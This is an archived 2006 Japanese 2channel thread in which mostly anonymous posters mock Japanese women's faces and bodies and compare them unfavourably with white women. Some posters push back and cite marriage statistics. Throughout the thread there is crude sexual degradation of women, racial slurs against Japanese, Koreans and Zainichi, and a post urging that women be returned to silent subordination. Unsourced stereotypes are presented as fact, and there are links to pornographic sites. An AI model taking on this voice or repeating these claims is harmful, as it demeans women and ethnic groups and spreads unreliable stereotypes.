2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

なぜ日本の女は不細工なのか*******

1 :パク・ポンジュン:2006/09/23(土) 01:37:26
かわいそうだが事実

不恰好な体型、低すぎる尻の位置、貧乳、ヒラメ顔、ガタガタの歯。。。。。

白人の女性と並ぶとその美しさの違いに絶句する

なぜなのか?神様って残酷だよなwwwww


2 :Ms.名無しさん:2006/09/26(火) 00:55:38
あんたって、血も涙もない男ね!
わたしたちは、そりゃあ白人美女に比べたら見劣りするでしょうよ
でもそれはしょうがないじゃん。人種ちがうんだし
だったらお前が白人と結婚しろ!この包茎!!

3 :Ms.名無しさん:2006/09/26(火) 00:57:04
>>1
白人女がおまいさんを相手にするとでも???

4 :Ms.名無しさん:2006/09/26(火) 01:14:30
白人女は近くで見るとニューハーフに見えるよー
遠くから見るときれいだけどね

5 :Ms.名無しさん:2006/09/26(火) 01:32:26
>>4
日本女は近くで見ると出来損ないに見えるよー
遠くから見るとタンソクがに股だし

6 :Ms.名無しさん:2006/09/26(火) 01:47:04
短足のお前と並んでも釣りあわんよ

7 :Ms.名無しさん:2006/09/26(火) 17:00:47
こんにちは。出来損ないの日本女です。
歯科矯正、確かに必要かと思われる。
確かに貧乳も多いな。

美容整形の為、大韓民国に逝ってきます!


8 :パク・ポンジュン:2006/09/29(金) 05:46:29
いよ〜!
バケーションから帰ってきたぜ

なぜ日本女はブサイクなのか、思いつく理由をどしどし書いてくれ

9 :Ms.名無しさん:2006/09/29(金) 05:55:24
化粧が無かったら日本の女ってどーなってるんだろうね。

10 :パク・ポンジュン:2006/09/29(金) 06:42:15
まあ世界でも最低レベルのブスになるんじゃねえか?

一重でぺちゃんこ鼻、ヒラメ顔、形の悪い眉毛で取るとこねえじゃんwwww

11 :Ms.名無しさん:2006/09/29(金) 07:36:40
白人が世界を征服しているから

12 :Ms.名無しさん:2006/09/29(金) 07:41:13
まあ価値観は支配者集団のものが社会に反映される罠
にしても日本の女は…

13 :Ms.名無しさん:2006/09/29(金) 09:04:55
優秀民族のあなた方、お国はどこ?
下品な香りが漂っているのですが、まさかあの国では…

14 :酸素ボンベ:2006/09/29(金) 09:59:19
シンクロとか美しさを競う競技は可哀相だと思う
日本勢が、うぉりゃーー!!って足上げても
露などとは長さが、、、自国びいきもあるが
日本勢が一番上手だと思う、華麗さ綺麗さも
採点の大きなポイントなのだろうがね

15 :パク・ポンジュン:2006/09/29(金) 10:15:15
まあ確かに技術的には日本はかなりのものだろうと思うぜ
でも笑顔の美しさ、体型、足の長さなどはまあ。。。。。。。。。。。。
絶望的だよな
美のレベルが比較にならないくらい下

16 :Ms.名無しさん:2006/09/29(金) 15:04:48
で、出来ない。あの腐った肉みたいな色のビラビラと生やし放題のマン毛
胸なしケツなし、顔は・・・ry  やっぱり白人女性じゃなきゃだめだ。

17 :Ms.名無しさん:2006/09/30(土) 00:10:23
>>1
日本人は世界でも稀に見る醜い体の民族だと言うね。
だから、その中でもブッサなやつは世界最底辺ということに・・・

18 :Ms.名無しさん:2006/10/07(土) 16:47:29
日本の女って化粧や整形で化けるし、
それを見抜けず騙されてる男も男だよね。
日本の女は詐欺師かしら。うふふ。

http://cocoa.gazo-ch.net/bbs/18/img/200610/1007203.jpg

before→after

http://news20.2ch.net/test/read.cgi/news/1159688583

19 :Ms.名無しさん:2006/10/07(土) 16:55:34
>>18
うわぁー、この不細工な顔は幾等なんでも酷過ぎるな。
これが大和なでしこ名物の女のマヤカシってやつか。
こんなのに騙されたらタマったもんじゃないな。

20 :Ms.名無しさん:2006/10/08(日) 03:01:19
>>18
すんげえ不細工すぎるバケモノ女(久々爆笑、マジ大爆笑!!)

21 :Ms.名無しさん:2006/10/09(月) 23:39:53
【韓国】 驚愕!ミスコリアになるには1億ウォン必要?80%が整形
http://www.joins.com/article/2458028.html?ctg=1502
http://news.joins.com/component/htmlphoto_mmdata/200609/htm_20060925141403c000c010-001.JPG
【韓国】 10代少女の60%「整形したい」
http://japanese.joins.com/article/article.php?aid=80549&servcode=400§code=400

22 :Ms.名無しさん:2006/10/10(火) 22:34:16
http://ime.nu/www.yuko2ch.net/mako/imgbbs3ji/img-box/img20061004224757.jpg

白人
http://www.megabustymodels.com/111st/bustypl2/gal6000/pic05.jpg

日本人
http://ime.nu/g007.garon.jp/gdb/GJ/2J/2R/4x/0G/tz/aI/1L/2X/vZ/0Q/uZv.jpg

インド人



23 :Ms.名無しさん:2006/10/11(水) 02:53:34
★日本の女はダサイから外人と結婚します。★  
http://image.blog.livedoor.jp/dqnplus/imgs/9/8/98935fa3.jpg

日本人


24 :Ms.名無しさん:2006/10/11(水) 06:39:47
メイク前はどの女もドッコイドッコイ

25 :Ms.名無しさん:2006/10/11(水) 11:27:51
デカ女胴長一番キモスしかも性格最悪。プライドたけぇし邪魔くせぇし可愛げねぇし

26 :Ms.名無しさん:2006/10/12(木) 03:20:39
日本の女はいらね

27 :パク・ポンジュン:2006/10/12(木) 04:27:11
>>23

この写真はとても素直に日本女と欧米女の違いを表してるよな
これが現実
おまいらも当然分かってるだろうが

28 :Ms.名無しさん:2006/10/12(木) 05:28:44
>>27
こんなの日本も米も一部の糞女だけでしょ
まともな子も一部だけどすぐ売り切れるからね

29 :Ms.名無しさん:2006/10/12(木) 06:27:58
日本人って誰かに頼るのが前提になってるし個人主義の白人から見たら便利なんだろな
日本人女はアメリカでイエローキャブとか言われてるし

30 :Ms.名無しさん:2006/10/12(木) 06:53:29
ブサイクの上に仕事でも家庭でも使い物にならんの
どうすんのこれ?

31 :Ms.名無しさん :2006/10/12(木) 08:42:08
外国人の肉便器として幸せに暮らすからいんじゃねw


32 :Ms.名無しさん:2006/10/12(木) 11:11:38
>>1
きもいのが整形するから余計にきもくなるという現実もありますね?

33 :パク・ポンジュン:2006/10/13(金) 21:04:24
>>31

肉便器って幸せなのか?
将来的には一番不幸な人種なんじゃねえか?

34 :Ms.名無しさん :2006/10/13(金) 21:22:11
>>33
私が言いたいのは彼氏、浮気相手、結婚相手、
全部外人ということでさ。
パクさんは外人??

35 :Ms.名無しさん:2006/10/13(金) 21:36:54
外人ていいよね
http://www.porno-vids.com/galleries/jonni_darkkoxxx/jamie-elle-lucy-thai/01.mpg

36 :д@:2006/10/13(金) 21:51:48
日本人だからって不細工なわけじゃないと思う。
私の周りに外国人は何人もいますが、外国人でも不細工はほんと不細工だし、胸ない子は胸ないし、日本人でも美人な子は白人女性に負けていませんよ?
最近、きれいな日本人の女性が増えてきてると思うんですが…。
むしろ、日本女は〜っていってる人の方が誰にも相手にされない不細工だから僻んでるんじゃないですか?w

37 :パク・ポンジュン:2006/10/13(金) 22:10:50
>>34

ははは!
パク・ポンジュンっていうのはただのコテ名だよ

>>36

俺北米に長年住んでて、妻は欧米人ですよ
まあこのスレ自体、半分釣スレのつもりだけど、もう半分は事実じゃないですか?
やっぱり美人の比率は日本女性の場合だと、欧米女性より低いです
あなたは海外在住なのかな?
きれいな日本女が増えてきてる??プチ整形で二重にしたり、鼻高くしたり顔小さくするのが
はやってるからじゃない?あと化粧の技術も上がってるし
スッピンだとマジ見れないような顔がほとんどじゃ?


38 :Ms.名無しさん:2006/10/13(金) 22:45:31
日本女ってたま〜に美しいと思ったら整形だったりでまじ不細工ばっかじゃないの?

39 :Ms.名無しさん:2006/10/14(土) 00:14:34
カタログとかで、下着のページになるとモデルが白人女性に変わりますよね
なぜかっていうと、日本人の女性だと陰毛が黒くて濃いから、下着に透けてみえちゃうからなんだそうです
あと、やっぱり体型が貧弱で(ガリガリ、ペチャパイ、平たい尻、短足胴長、身長がないetc)商品が見栄えしないっていうのも理由。
やっぱり日本女性だと、野暮ったくなっちゃうみたい
笑顔の美しさとか、歯並び、姿勢なんかも欧米女性と比べると見劣りするしね


40 :Ms.名無しさん:2006/10/14(土) 23:29:14
>>36

キモイ女


41 :Ms.名無しさん:2006/10/15(日) 05:52:14
SAYURIでチャンツイイが起用されるぐらいだからね
白人に負けてないとかマジで目歪んでんちゃうの?
日本巨顔黄猿と白人様なんて原子レベルから別次元の生き物だろ

42 :Ms.名無しさん:2006/10/15(日) 16:47:54
自分の顔に自信のある女は化粧しない。
自分の顔に自信のない女は化粧して誤魔化す詐欺師。
これは犯罪です。

43 :Ms.名無しさん:2006/10/15(日) 19:56:43
女に限らず日本人は全員ぶさいく

44 :Ms.名無しさん:2006/10/15(日) 21:11:47
>>43
男でブサイクでもまあ他でカバーできるが、女でブサイクじゃ終わってるじゃんwww

45 :Ms.名無しさん:2006/10/16(月) 09:58:43
男が立てたスレ多杉

46 :Ms.名無しさん:2006/10/17(火) 11:16:44
こりはまた鋭く事実を突いたスレでごじゃるな
じいも全く同感でごじゃる
我が国の女子は世界に紹介するも恥ずかしいブチュばかりじゃ
こびゅ!こびゅ!こびゅ!ぶひょょょ〜〜〜〜ん!

47 :Ms.名無しさん:2006/10/17(火) 13:08:30
女性板は男性にのっとられつつある

48 :Ms.名無しさん:2006/10/17(火) 13:40:10
女に飢え過ぎw
かまってもらいたいんでしょ

49 :Ms.名無しさん:2006/10/17(火) 20:50:33
>>48

日本の女からは絶対相手にしてもらいたくねーなー
基本的にスタイル良くないし、顔も魅力ないから相手にしてもらっても虚しいだけなんだよな
日本女はあんまり俺のそばに来るなって感じだな
ロシアとかカナダの女知ってるやつはだいたいそう思う
日本女にたいしては、飢えるということは絶対ない
むしろ邪魔者扱いだな

50 :Ms.名無しさん:2006/10/17(火) 23:18:47
サイズなんて関係ないんだ。彼女も俺にそう言ってたし。
テクニックと愛でカバーできるよ。実際、彼女をいつもイカせてるし。

「サイズなんて、関係ないし、気にしないわ」
のようなお決まり文句は、全部、女の思いやりなのです。
それに全ての女は、イッたふり演技となると、女優なみにできるのよ。
男のプライドを傷つけちゃ悪いと思ってるわけよ。

でもね、ホンモノを知っちゃったら、誰も日本男になんて、抱かれたく
ないのよ。あたしたち日本の女だってそう思うぐらいなんだから、
白人男サイズに慣れてる白人女が、貴方たちとエッチしたい訳ないでしょ。


51 :Ms.名無しさん:2006/10/17(火) 23:24:28
正論

2chにいる男には抱かれたくないな

52 :Ms.名無しさん:2006/10/17(火) 23:48:49
特に馬鹿ん西の女は最悪!

53 :Ms.名無しさん:2006/10/17(火) 23:49:42
>>51
お前実際誰が2chにいる男か分かるの?w

>>50
何が言いたいのか意味不明だな
白人女が白人男サイズに憧れてる?ってなんじゃこりゃ?
お前白人女の事どこまでしってんの?
こういうのを負け犬女の遠吠えという
白人男からはせいぜい肉便器扱いくらいしかされないカスがなにを言ってんだかww


54 :Ms.名無しさん:2006/10/17(火) 23:57:03
身長あっても日本の女は尻の位置低いから意味ねぇ!悪目立ちするだけ

55 :Ms.名無しさん:2006/10/18(水) 00:00:48
お尻が突き出てて腰を振れる女は体を正しく使えていて柔軟で運動神経が良い。
身体科学的に見てそれが一番理想的な体型。
日本人女はお尻が突き出てるどころかぺちゃんこで、がりがりで、そのため背中も猫背で当然腰も振れないし
体が正しく使えていないため体が堅く、あらゆる部分が歪みまくっている。
だから運動神経も鈍い。 外人女を見てみろ! お前ら不健康に痩せすぎだ! 色気0。

56 :パク・ポンジュン:2006/10/18(水) 21:04:06
ほら!日本女ども!お前らも何か書き込んでみろよ!www

57 :Ms.名無しさん:2006/10/19(木) 10:57:23
超良スレあげ

58 :Ms.名無しさん:2006/10/22(日) 09:30:25
>>18
詐欺罪の85%は男なのに整形だけで日本の女は詐欺師だなんて言う>>18>>18だよね。
男女厨ってなんでこんなにキモいんだろ。
ttp://www.npa.go.jp/toukei/keiji25/H16_02.pdf

59 :Ms.名無しさん:2006/11/02(木) 05:36:53
黄色い肌はそれ自体で減点もの

60 :Ms.名無しさん:2006/11/02(木) 05:39:42
在日チョンの糞便所スレ発見!!!

61 :Ms.名無しさん:2006/11/02(木) 05:41:46
自演やナリスマシが多いが
スレ全体にキムチの腐臭が立ち込めてるなw

62 :Ms.名無しさん:2006/11/02(木) 14:10:49
>>53 こいつ馬鹿www
漢字も読めないのか 
×憧れ  〇慣れ
だよ。
>>50 の言ってるのは、白人の女は当然ながら、白人の男と普通にエッチ
してるワケで、もし白人女が日本の男と寝たら、

白人女「ねぇ・・早く入れて?」

日本男「え? もう入ってるじゃん」

白人女(う、うそ・・・・)絶句

という小噺にしかならないってことでしょう。



63 :Ms.名無しさん:2006/11/03(金) 12:36:10
>>62
っていうかさぁ、そーゆー小噺自体が、もてない日本女の負け惜しみってやつじゃ?ww


64 :Ms.名無しさん:2006/11/03(金) 14:21:52
>>63 いや、たしかTV-SHOWのコントで、こういうの見たよ。
白人の女が「あたし、サ、サイズは気にしないから」とか
日本人役の俳優に言うと、観客席が大爆笑っていうヤツ。

65 :Ms.名無しさん:2006/11/03(金) 21:58:41
お笑いネタを現実と取る幼稚な日本女ww

66 :Ms.名無しさん:2006/11/03(金) 22:05:23
性格きついのが最悪
容姿悪いのは目を瞑れるけど
性格は目を瞑っても意味ないし

67 :Ms.名無しさん:2006/11/03(金) 22:17:02
>>64
同じようなTV番組が欧米にもあるよ
日本女に扮した役者が、下手な英語で通行人の男にSEXを媚びてるってやつ
出っ歯で変なメガネかけてて猫背でヒョコヒョコ歩いてた
っで、Do you like sexy Japanese Girl? とか言ってるの
それ見て、日本女って海外進出してるのも多いが、やっぱり軽蔑の対象程度の存在なんだなと思ったよ

68 :Ms.名無しさん:2006/11/03(金) 22:18:04
>>65
まさか君は2chネタを現実と取ってないよね?w

69 :Ms.名無しさん:2006/11/03(金) 22:24:42
日本のご先祖様が不細工だから現在の男女も不細工。


70 :Ms.名無しさん:2006/11/04(土) 00:04:19
日本の女は恥ずかしいから外に出るな

71 :Ms.名無しさん:2006/11/04(土) 00:07:50
内面が糞だからより一層醜くなる

72 :Ms.名無しさん:2006/11/04(土) 00:26:26
男も女も、軽蔑の対象なんだね。

かわいそうな民族だな、日本人。

73 :Ms.名無しさん:2006/11/04(土) 00:37:20

すごいアホな民族ジョークを聞いたことがある。
アフリカ人と、アメリカ人と、日本人の男が、ある実験室にいた。
博士が出てきて言う。
「私はものすごい発明をした。このリングをチン〇の根っこにハメれば、
チン〇を自由に股間から取り外すことができるのだ。
カバンにチン〇を入れて、持ち歩き、必要なときにだけ股間に取り付ける
ことができるのだ」

アフリカ人の男が即座に言った。
「バカバカしい!! そんな意味のない物を発明して何の役に立つんだ!」

アメリカ人も言った。
「その通りだ! 大体、もしカバンなどに入れて持ち歩いていて、
誰かに盗まれたらどうするんだ!!」

それを聞いた日本人が、ハッとなって言った。
「他人のチン〇でも、くっつけられますか?博士?」


74 :Ms.名無しさん:2006/11/04(土) 01:13:13
コンプレックスの塊みたいな男どもが頑張ってカキコしてますねww
上のほうで出てきた「イエローキャブ」って実は創作だったって知ってた?ww
外人(白人)=美の象徴っていうその短絡さが超ウケるんですけどww
もろコンプレックスの裏返しじゃんww実際外人あまり見たことないんじゃないww
外人も綺麗だと思う人もいるけど、それだけ。
外人と付き合いたいとは思わない。
日本人の方がずっと魅力的に見えるから

75 :Ms.名無しさん:2006/11/04(土) 01:21:39
ドブスが必死だなw

76 :Ms.名無しさん:2006/11/04(土) 01:46:51
白人はいらんな
性格最悪な日本人もいらない

77 :Ms.名無しさん:2006/11/04(土) 22:18:36
>>74

イエローキャブが創作ってどういう意味だ?
白人男で日本女にタカってるやつらはみんな使ってるぞ
あとスクールバスとも言ってる
アメリカのスクールバスって黄色いんだよ
で、子供を順番に乗せていく。つまり目についた男とみんな順番にSEXしてく奴って意味
ニューヨークでは無料売春婦って言われてた
日本女って世界では軽蔑されまくってるよ
お前も恥ずかしいなら海外には出ないほうがいいよw

78 :Ms.名無しさん:2006/11/05(日) 02:25:20
>77
家田荘子の本読んで本気になっちゃったの?ww
イエローキャブはもちろんタクシーの意味。
日本女性を指す意味でなんてアメリカじゃ誰も使わないし、
第一そんな意味だということすら知らない。
昔、米軍基地周辺でアメリカ男を漁る日本女性のドキュメントとかやってたけど、
全部ヤラセだったの知ってる?
あんたこそ海外には出ないほうがいいよww
在日男さん。あっ在日女ですか?ww

79 :Ms.名無しさん:2006/11/05(日) 02:37:03
>>77
実際に聞いたのなら、底辺外人と付き合ってきたことを恥じろ。
それを言ったアメリカ人を軽蔑しろよ。
ヘラヘラしてその通りだと思ったんならお前こそ恥だ。
あんたも日本人なら自国に誇りを持てば?


80 :Ms.名無しさん:2006/11/05(日) 02:39:59
イエローキャブが必死だなw

81 :Ms.名無しさん:2006/11/05(日) 02:41:56
>>74>>78-79
よう。イエローキャブ

82 :Ms.名無しさん:2006/11/05(日) 02:54:15
>79
いや、日本人じゃないからww

83 :Ms.名無しさん:2006/11/05(日) 02:57:44
イエローキャブ

84 :Ms.名無しさん:2006/11/05(日) 02:58:14
>>82
なら遠慮なくお前を軽蔑するわ。

85 :Ms.名無しさん:2006/11/05(日) 02:59:14
イエローキャブw

86 :Ms.名無しさん:2006/11/05(日) 03:04:23
黄色人種の男が白人女に憧れてる事自体、
白人から見れば侮蔑のネタなんだがな。

87 :Ms.名無しさん:2006/11/05(日) 03:06:08
イエローキャブ

88 :Ms.名無しさん:2006/11/05(日) 03:18:34
【激論】司法試験受験生が考える霞っ子クラブの是非
http://school5.2ch.net/test/read.cgi/shihou/1162290409/l50


89 :Ms.名無しさん:2006/11/05(日) 03:31:03
白人女は彫りが深いから苦手

三枝夕夏みたいなかわいい子は白人女にはいない

90 :Ms.名無しさん:2006/11/05(日) 05:25:40
>>78
もし本気で書いてるんなら、お前かなり頭のイカレタ変人だな
ヤラセとか言ってるけど、じゃあそれを証明してみろよ
確証のある出典を示せよ
それが出来ねえんじゃ、お前の言ってる事なんか誰も信じねえよw



91 :Ms.名無しさん:2006/11/05(日) 08:50:36
>>90
必死だねー
わらけるわ(´ε`)プップー

92 :Ms.名無しさん:2006/11/05(日) 10:20:06
酷い顔だ・・・

93 :Louise ◆YXT5Op9B4o :2006/11/05(日) 10:24:54
白人女性の体型より日本人女性の体型の方が好き。
何か白人女性の体型って別にキレいだとは思わない。

94 :Louise ◆YXT5Op9B4o :2006/11/05(日) 10:26:14
ちなみに実際にイギリスに住んでいました。

95 :Ms.名無しさん:2006/11/05(日) 10:31:12
俺、ブス専だから関係ないな。まぁ限度があるけど

96 :Ms.名無しさん:2006/11/05(日) 22:20:11
>>91
ついに反論もできず降参ですか??(笑)
じゃあお前の言ってた事は全部ウソな訳だね
俺は初めからそんなの知ってるけどよ
バカなやつだな
もうちっとお勉強してからカキコしな、恥さらしちゃん
中途半端にかじった知識じゃーすぐボロがでるよ

97 :Ms.名無しさん:2006/11/06(月) 00:19:38

☆日本の女を、戦前の女たちのように貞淑で、
男より一歩下がって歩く、静かな生き物に戻す会結成☆
------------------------------------------------

昔はよかったんだよ。俺たちを差し置いて、外国人と
付き合おうなんて、しゃしゃり出てくる女なんか、
殆どいなかったしな。
同じ人種だってのに、背も低く、スタイルも悪くて
ブサイクな日本人だってのに、ただ「女」だってだけで、
「カンタンに股を開く」ってだけで、外人男が寄って来やがる。

翻って、俺たちはどうだ??
「世界で一番もてないのは日本男だ」
などという、不愉快な烙印を押され、性的魅力が劣るだの
アレが短小だの、女たちから嘲笑される始末!

こんなことが許されていいのか? 女っつうのは、男の後ろで
黙って控え、男に文句など言わず、与えられたモノで
満足しているべきなのだ。まして、外人の男と俺様たちを
比べてあれこれ批評するなど、もっての他だぜ。

女共だけ、いい思いさせてたまるかよ!!!!
俺たちと同じ地獄に、引き摺り下ろしてやろうぜ!!!!




98 :Ms.名無しさん:2006/11/06(月) 00:26:10
かっこ悪いけど性格いい男の子は、かっこわるいけど性格いいって高評価
ブスだけど性格いい女の子は、性格いいけどブスって悪評

99 :Ms.名無しさん:2006/11/06(月) 09:18:58
>>97
まあ落ち着け
べつに女だけいい思いしてる訳じゃないし
実際は、外人男からはカモにされたり、ていのいい家政婦がわりで利用されて、あとはポイ、ってパターンがほとんどな訳だしw
肉便器にだけはなりたくない、って心底思ってるんだけど肉便器のレベルで終わってるのがほとんどだしw


100 :ぼるじょあ ◆yBEncckFOU :2006/11/06(月) 10:06:23
(,,・3・)<アルエー ぼるが100げっとぉー

101 :パク・ポンジュン:2006/11/06(月) 12:08:56
おお、100いったか
海外版のほうの本スレもよろしく!

102 :Ms.名無しさん:2006/11/06(月) 14:47:58
>>99 利用されてポイの繰り返しでもいいから、
白人女と付き合いたい。
そもそも全く相手にされてないのが辛い。

103 :Ms.名無しさん:2006/11/06(月) 14:54:09
外人女性って背が高いじゃん
日本人って足が短いじゃん
無理じゃん

アジアならいいんじゃん、ベトナムとかだと日本男性モテルよ!
つまり底辺同士ってことで解決

104 :Ms.名無しさん:2006/11/06(月) 15:12:06
>>103「俺の彼女は、ベトナム人なんだ」
なんて、珍しがられることはあっても
羨ましがられないだろうから、やっぱイヤだ。

白人だったら、皆から一目置かれるだろ

105 :Ms.名無しさん:2006/11/06(月) 15:24:42
一目置かれるか?w

お世辞で誉めても白人コンプ丸出しだって思うぐらいだよ。


106 :Ms.名無しさん:2006/11/07(火) 12:24:30
>>103 ベトナムの女性って綺麗だよ〜!尽くしてくれるし。
相手に要求ばっかしてくる日本女よりぜんぜん本命だけど?
日本女って、相手に色々言う前にまず自分がそれに値する人間かどうか考えるといいよw

107 :Ms.名無しさん:2006/11/07(火) 12:29:28
>>102
全く相手にされないより、利用されてポイのほうが、自尊心崩壊するけどなぁ
動物と同じ扱いみたいな
全く相手にされないんだったら、別にこちらも他の人を探すだけだし

108 :Ms.名無しさん:2006/11/07(火) 14:36:37
ベトナムとかタイとか、スゲエ勢いで土産物買え!買え!と
喰らいついてくるから、もう行きたくねえよ。
目を三角に尖らせたちっさい女が、
「オンリー 20バーツ!! 20バーツ!!」
とか言いながら行く道を阻み、英語で
「安いよ。お金あるでしょ? ないの?あるの知ってるよ!」
最後には
「ふん、バカ!」だぜ。 
 


109 :Ms.名無しさん:2006/11/07(火) 17:03:39
育ちがまともな日本人なら日本人と恋愛するはずですが。
男女問わずね。

110 :Ms.名無しさん:2006/11/07(火) 22:03:06
>>109 それは大間違い。昔のことならともかく、今は国際化時代。
日本人男性の10人に1人は国際結婚する時代だよ。
お嫁さんもヨーロッパ人からアメリカ人、東南アジア、ロシア人、中国人と多種多様
今の日本人男性は外国人女性の魅力を認識して、日本女にはない魅力に気ずいてる
普通に日本女と恋愛する退屈な人生からおさらばしてるよ

111 :Ms.名無しさん:2006/11/07(火) 22:54:09
>>110
でも国際結婚っていっても、男が日本人の夫婦は、
27881組中、24799組が中国、朝鮮、韓国,フィリピン、タイ妻
だってさ。これって、ビザ目的の偽装出稼ぎ婚じゃねえの?

フランス、スイス、イギリス、アメリカあたりの白人で
奥さんになってくんないかな。

112 :Ms.名無しさん:2006/11/07(火) 23:28:00
日本人の漢は漢らしく生きようや。
女が何をしても笑って許せる器量をもとうや。

113 :Ms.名無しさん:2006/11/08(水) 01:43:49
>>112
馬鹿女さえ許容しうる日本の男の懐の深さは現代社会の闇を生み出した
今、日本の男に必要なものは悪に対し厳しく臨む姿勢である
決して女を甘やかしてはならない

114 :Ms.名無しさん:2006/11/08(水) 02:11:51
甘やかしたら調子こきまくったくせにこれ以上甘やかせとwwwww

115 :Ms.名無しさん:2006/11/08(水) 12:38:56
>>111
奥様は外国人とかのTV番組見ると、欧米の奥さんも結構いるよ
あと、その統計ってどこから見つけたの?
日本在住の夫婦だけの統計?
海外在住の日本人男&欧米女性の夫婦も結構多いよ

116 :Ms.名無しさん:2006/11/08(水) 13:09:49
http://www.mhlw.go.jp/toukei/saikin/hw/jinkou/suii04/marr2.html
厚生労働省の統計データ


http://ja.wikipedia.org/wiki/%E5%9B%BD%E9%9A%9B%E7%B5%90%E5%A9%9A#.E5.9B.BD.E9.9A.9B.E7.B5.90.E5.A9.9A.E3.81.A8.E9.9B.A2.E5.A9.9A.E7.8E.87
夫が日本人で妻が外国人である場合
日本人同士の結婚と同じような過程を経て結婚する場合は問題はなく、日本人同士におけるのと
区別して考える必要はない。しかし、一般に東南アジアなど日本より経済力の劣る国から妻を
迎える場合、日本との経済力の差から、結婚を名目とした出稼ぎも少なくないと目されている。
こうした場合、当然ながら結婚生活はうまくいかず離婚に至るケースも少なくない。

実際に、日本人「夫」が仲介業者を経て名義を賃貸し婚姻届の提出により「結婚」が成立していた
という事例も判明している。業者は日本の暴力団などと海外のマフィアなどが協力して事業を
行っている場合が普通である。これは、性産業従業員に関しても同様のことである。

日本国は、こうした事例に対処するため2006年前半期より一部の国・地方に対し30代未満の
外国人女性へのビザ発行を全面的に取りやめた。実際上、日本国にとって暴力団関係の問題を
引き起こすのは10代後半から20代の女性が多かったからであると言われる。こうした規制や
警察による検挙努力により、現在(平成18年)はこの様な偽装結婚は少なくなったが、その反面
より目立たない形の悪徳国際結婚仲介業者は増えている。



117 :Ms.名無しさん:2006/11/08(水) 14:18:13
>>115 海外在住の日本人男&欧米女性の夫婦も結構多いよ
結婚後の居住地は、夫婦の経済基盤を考えても、妻の国に住むよりも
夫の国に住むパターンが多数派だから(夫の仕事が優先されるほうが多いから)
海外在住の日本人妻&外人夫のほうが、かなり多いかもしれないね。

118 :Ms.名無しさん:2006/11/08(水) 17:18:07
日本古来の漢らしさとは女に媚びるなどもっての他で、
女のことなど微塵も気に留めることはなく、
女をまるで物が如く扱う。これこそが真の漢らしさ

119 :Ms.名無しさん:2006/11/08(水) 17:19:25
ハゲ乙www

120 :Ms.名無しさん:2006/11/08(水) 22:46:33
>>117
君は海外在住の経験ないでしょ
俺は北米在住だが、(3年)知ってる範囲内で13組のカップルが日本男&欧米妻だよ
マジレスすると、俺の妻も欧米人だよ

121 :Ms.名無しさん:2006/11/08(水) 22:52:33
お前ら大事なことをいろいろ忘れてる。

結婚すると外人妻が毎日料理を作るんだぞ。
外食みたいにたまにならいいが、絶対和食が恋しくなる。
若いときは美しくても白人女は結婚するとすぐに高確率でピザになる。
彼女の母親を見てみろ、おんなじ太り方するぞ。
それに色素が薄く肌も弱いからシミ、シワと劣化が早く老化が早い。
当然レディーファーストを求めるし、
下手すると日本の女以上に主張するぞ。
自己主張も激しいし折れない。

美しさだけを買ったのなら後悔するぞ。

122 :Ms.名無しさん:2006/11/08(水) 22:55:24
>>120
マジ杉

123 :Ms.名無しさん:2006/11/08(水) 23:20:40
>>121
俺は妻に毎日料理は作らせないよ
俺も交代で作ってる
あと、白人は太るっていう話は今は当てはまらないぞ
昔と違って今の女はダイエットに気をつけたり、ジムに通ったりしてるしな
むしろ日本女のほうが肥満体のやつ増えてるんじゃないか?欧米化した食事と運動不足で
肌は確かに弱いが、夏はサンスクリーン付けたり、ちゃんとした処置をすれば劣化、老化は防げる
老化、劣化っていうのは、人種じゃなくて食事とか生活習慣が主な原因
肌の白さ、美しさに関しては、一度彼女達の肌を経験すると、どんな色白な日本女も真っ黄色に見えてくるよ
自己主張などに関しては、これも人種じゃなく個人それぞれ
静かで素直な白人女性も沢山いるよ
むしろ日本女のほうがいろいろ細かい事にこだわったり、絶対折れない奴が多いんじゃねえか?

124 :Ms.名無しさん:2006/11/09(木) 00:53:25
>>123
この板の男達が日替わりで料理をするほど家事に協力的とは思えないし、
そもそも海外で働くだけの語学力もないと思われる。
出会いがあるのは、出稼ぎに来たアジア系のおねえちゃんぐらいでしょ。

あなたの話はここの住人にとっては非現実的すぎて迎合されないと思うよ。
それこそ自慢にしか聞こえないんじゃない?

日頃のストレスから女を叩きにきたのに、
自分より上の男に自慢されちゃここの男達が可哀相。



125 :Ms.名無しさん:2006/11/09(木) 01:08:42
やつらは日頃のストレスから女を叩いてるんじゃなくて、お遊びで女を叩いてるって言ったほうが正解なんじゃ?
別に俺は自慢話してるわけじゃなかったんだが

あと、この板の男達ってお前、誰がここに書いてるか知ってんのか?
勝手に自分の想像で語るのは愚の骨頂だぞ


126 :Ms.名無しさん:2006/11/09(木) 01:24:10
>>125
自分語りうざいよ。
なんつーか個人の話を延々されても。
自慢じゃなかったら何しに来てるんだか。

お遊びで女を叩くって、理由が純粋にそれなら中学生以下だろ。
お前は勝ち組で優秀かもしれないが、
誰がここに書いてるか知ったら2chに書き込みたくなくなるぞw



127 :Ms.名無しさん:2006/11/09(木) 01:25:01
>>120は単に自分の周りの話をしていて、>>117は、一般的な傾向の
話をしてるんじゃないか?

128 :Ms.名無しさん:2006/11/09(木) 17:21:02
>>124
>>123が自慢話に聞こえるのは劣った女だからじゃね?

129 :Ms.名無しさん:2006/11/09(木) 17:44:00
能力もなく日本語しか話せない男が外人嫁欲しがってるなんて笑えるw

不恰好な体型、低すぎる尻の位置、貧乳、ヒラメ顔、ガタガタの歯。。。。。
裏を返せばまんま日本の男じゃん。
あ、貧乳は粗チンねw


130 :Ms.名無しさん:2006/11/10(金) 05:34:47
>>129
そういうお前は日本の男からも相手にされず一生独身ですか?ww

131 :Ms.名無しさん:2006/11/10(金) 18:53:27
自分だって不細工な日本人男なのに、外人女にしか興味のない男きもい。
ばかじゃない?

132 :Ms.名無しさん:2006/11/10(金) 21:51:10
>>131
日本の男が自分に振り向かないで外人女とつきあってることがそんなに悔しいか?w
悔しかったら男に振り向かれるようないい女になってみろ
まずは整形からかw

133 :Ms.名無しさん:2006/11/10(金) 22:37:27
ここに書き込む女が日本男に相手にされてないという妄想が笑える。

自分に自信がなかったら反論なんてしないよ。

134 :Ms.名無しさん:2006/11/10(金) 22:40:48
でも日本語しか話せないのに外人嫁欲しがるのは怠惰だよ。
そんなんじゃ金やビザ狙いの底辺外国人のいい餌食だ。



135 :Ms.名無しさん:2006/11/11(土) 00:34:24
>>131 でも不細工な日本人男は、外人女を追ってさすらいの旅にでも
出ていってもらったほうがいいんじゃない?

とりあえず目の前に現れないでくれれば、ラッキーだよwww

